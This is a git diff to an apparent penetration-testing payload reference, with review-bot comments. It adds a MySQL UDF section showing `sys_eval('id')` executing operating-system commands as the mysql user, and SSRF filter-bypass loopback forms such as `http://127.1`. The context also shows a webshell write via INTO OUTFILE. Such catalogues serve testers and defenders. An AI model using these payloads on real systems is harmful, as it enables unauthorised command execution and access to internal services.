diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index cbae419..b5e5ee1 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -21,6 +21,7 @@ * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) * [MYSQL Read content of a file](#mysql-read-content-of-a-file) * [MYSQL Write a shell](#mysql-write-a-shell) +* [MYSQL UDF command execution](#mysql-udf-command-execution) * [MYSQL Truncation](#mysql-truncation) * [MYSQL Out of band](#mysql-out-of-band) * [DNS exfiltration](#dns-exfiltration) @@ -250,6 +251,29 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY ' SELECT sys_eval('id'); ++--------------------------------------------------+ +| sys_eval('id') | ++--------------------------------------------------+ +| uid=118(mysql) gid=128(mysql) groups=128(mysql) | ++--------------------------------------------------+ +``` + + ## MYSQL Out of band ```powershell diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 3bc09a1..ad9bc9f 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -136,10 +136,12 @@ localhost:+11211aaa localhost:00011211aaaa ``` -Bypass using rare address +Bypass using rare address, you can short-hand IP addresses by dropping the zeros ```powershell http://0/ +http://127.1 +http://127.0.1 ``` Bypass using bash variables (curl only)
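Review bot: In the first hunk (the table-of-contents change in `SQL Injection/MySQL Injection.md`), the new entry `* [MYSQL UDF command execution](#mysql-udf-command-execution)` is placed between "MYSQL Write a shell" and "MYSQL Truncation", but the body hunk later in this patch inserts the new section immediately before `## MYSQL Out of band`; confirm that the TOC order matches the actual order of the headings in the file, and that the new section's heading is spelled exactly `## MYSQL UDF command execution` so the `#mysql-udf-command-execution` anchor resolves when the page is rendered.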
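Review bot: In the second hunk (the new section body at `@@ -250,6 +251,29 @@` in `SQL Injection/MySQL Injection.md`), the only prose-level information the example carries is the output table, `| uid=118(mysql) gid=128(mysql) groups=128(mysql) |`; the section should state explicitly what that output shows, namely that `sys_eval('id')` runs with the privileges of the MySQL service account rather than the web server or root, and should name the preconditions the technique depends on (a database user able to write a library into the plugin directory, which the `FILE` privilege and `secure_file_priv` govern, and a writable `plugin_dir`), since those are exactly the settings a defender checks and a tester must confirm before the section applies. Also check the end of the hunk: it adds a closing ```` ``` ```` fence and an empty line directly before the existing blank line ahead of `## MYSQL Out of band`, which may leave two consecutive blank lines; one is enough.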
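Review bot: In the third hunk (`Server Side Request Forgery/README.md`), the changed heading `Bypass using rare address, you can short-hand IP addresses by dropping the zeros` is a comma splice and describes the mechanism loosely: `127.1` and `127.0.1` work not because zeros are removed from the text but because `inet_aton`-style parsers accept fewer than four dotted components and pad the missing octets, so both resolve to `127.0.0.1`, while `http://0/` (the existing entry) reaches the local host because `0.0.0.0` is treated as "this host" on most systems. Suggested wording: "Bypass using rare address formats: parsers that follow `inet_aton` accept fewer than four dotted components (`127.1` and `127.0.1` both resolve to `127.0.0.1`), and `0` resolves to the local host." A one-line note that a deny-list should canonicalize the address (resolve it and compare the resulting IP) rather than match the literal string would also help readers on the defensive side, since that is the check these shortened forms evade. Minor: the fence in this context is tagged ```` ```powershell ```` although the lines are bare URLs; ```` ```text ```` would be accurate, but that is pre-existing and can be left for a separate change.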